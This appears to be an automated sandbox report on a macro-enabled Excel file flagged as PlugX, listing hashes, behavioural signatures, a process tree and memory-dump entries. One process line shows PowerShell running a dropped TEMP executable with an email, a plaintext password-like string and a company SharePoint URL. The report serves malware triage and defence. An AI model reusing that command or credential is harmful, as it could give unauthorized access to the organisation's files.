Analysis

  • max time kernel
    137s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    29-03-2022 23:26

General

  • Target

    6e4513d1bc45644004b84e3a4bfc027b428bea3484ceaaa7489778fa9f7a88c9.xlsm

  • Size

    1.6MB

  • MD5

    d9c0d4a7bbb8ec67b195daa158f04f5f

  • SHA1

    ffcfeca98f3aeb343bba753cd3d84f1770b7665e

  • SHA256

    6e4513d1bc45644004b84e3a4bfc027b428bea3484ceaaa7489778fa9f7a88c9

  • SHA512

    421f6ddda2c26ba8434cde9a9c8337b8dc88c3d8be378b0f56d1f9bb8ef3e675e3f4b2a8a03f5f6df6dd2b039a0beed1791a1e8c5c35adb7c926b433d597f228

Score
10/10

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • PlugX Rat Payload 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6e4513d1bc45644004b84e3a4bfc027b428bea3484ceaaa7489778fa9f7a88c9.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:60
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "& ($env:TEMP + \"\SPD.exe\") \"[email protected]\" \"Nhh2H5urwHv0\" \"https://finansco.sharepoint.com/Delte dokumenter/Finansco Gruppen Fellesmappe/Modellporteføljer/\" \"Produktark MPF Kopi.xlsx\""
        2⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3312
      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
        "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 6292
        2⤵
        • Process spawned suspicious child process
        • Suspicious use of WriteProcessMemory
        PID:4028
        • C:\Windows\system32\dwwin.exe
          C:\Windows\system32\dwwin.exe -x -s 6292
          3⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          PID:784
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:2236

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/60-148-0x000002A771100000-0x000002A771122000-memory.dmp
        Filesize

        136KB

      • memory/60-158-0x000002A7710CB000-0x000002A7710CF000-memory.dmp
        Filesize

        16KB

      • memory/60-132-0x00007FFBE03F0000-0x00007FFBE0400000-memory.dmp
        Filesize

        64KB

      • memory/60-133-0x00007FFBE03F0000-0x00007FFBE0400000-memory.dmp
        Filesize

        64KB

      • memory/60-134-0x00007FFBE03F0000-0x00007FFBE0400000-memory.dmp
        Filesize

        64KB

      • memory/60-130-0x00007FFBE03F0000-0x00007FFBE0400000-memory.dmp
        Filesize

        64KB

      • memory/60-136-0x000002A758BD0000-0x000002A758BD4000-memory.dmp
        Filesize

        16KB

      • memory/60-137-0x000002A771280000-0x000002A771422000-memory.dmp
        Filesize

        1.6MB

      • memory/60-138-0x00007FFBF4250000-0x00007FFBF4D11000-memory.dmp
        Filesize

        10.8MB

      • memory/60-139-0x000002A7710C0000-0x000002A7710C2000-memory.dmp
        Filesize

        8KB

      • memory/60-140-0x000002A773E90000-0x000002A7768F0000-memory.dmp
        Filesize

        42.4MB

      • memory/60-141-0x000002A7716D0000-0x000002A771964000-memory.dmp
        Filesize

        2.6MB

      • memory/60-142-0x000002A771060000-0x000002A7710BC000-memory.dmp
        Filesize

        368KB

      • memory/60-150-0x000002A77AC10000-0x000002A77EF26000-memory.dmp
        Filesize

        67.1MB

      • memory/60-144-0x000002A771000000-0x000002A771022000-memory.dmp
        Filesize

        136KB

      • memory/60-145-0x000002A7728D0000-0x000002A773660000-memory.dmp
        Filesize

        13.6MB

      • memory/60-146-0x000002A758E30000-0x000002A758E40000-memory.dmp
        Filesize

        64KB

      • memory/60-147-0x000002A7710F0000-0x000002A7710FA000-memory.dmp
        Filesize

        40KB

      • memory/60-149-0x000002A7710C3000-0x000002A7710C5000-memory.dmp
        Filesize

        8KB

      • memory/60-160-0x0000029F52CDB000-0x0000029F52CDD000-memory.dmp
        Filesize

        8KB

      • memory/60-143-0x000002A771970000-0x000002A771B32000-memory.dmp
        Filesize

        1.8MB

      • memory/60-151-0x000002A771130000-0x000002A771158000-memory.dmp
        Filesize

        160KB

      • memory/60-152-0x000002A771200000-0x000002A771250000-memory.dmp
        Filesize

        320KB

      • memory/60-153-0x000002A758EC0000-0x000002A758ED0000-memory.dmp
        Filesize

        64KB

      • memory/60-154-0x000002A7710D0000-0x000002A7710E8000-memory.dmp
        Filesize

        96KB

      • memory/60-155-0x000002A771430000-0x000002A77148A000-memory.dmp
        Filesize

        360KB

      • memory/60-157-0x000002A7710C9000-0x000002A7710CB000-memory.dmp
        Filesize

        8KB

      • memory/60-156-0x000002A7710C6000-0x000002A7710C8000-memory.dmp
        Filesize

        8KB

      • memory/60-131-0x00007FFBE03F0000-0x00007FFBE0400000-memory.dmp
        Filesize

        64KB

      • memory/784-169-0x0000000000000000-mapping.dmp
      • memory/2888-135-0x0000000000000000-mapping.dmp
      • memory/3312-159-0x0000000000000000-mapping.dmp
      • memory/3312-161-0x000001D8A0840000-0x000001D8A0862000-memory.dmp
        Filesize

        136KB

      • memory/3312-162-0x00007FFBF4250000-0x00007FFBF4D11000-memory.dmp
        Filesize

        10.8MB

      • memory/4028-163-0x0000000000000000-mapping.dmp
      • memory/4028-172-0x00007FFBE03F0000-0x00007FFBE0400000-memory.dmp
        Filesize

        64KB

      • memory/4028-170-0x00007FFBE03F0000-0x00007FFBE0400000-memory.dmp
        Filesize

        64KB

      • memory/4028-171-0x00007FFBE03F0000-0x00007FFBE0400000-memory.dmp
        Filesize

        64KB

      • memory/4028-173-0x00007FFBE03F0000-0x00007FFBE0400000-memory.dmp
        Filesize

        64KB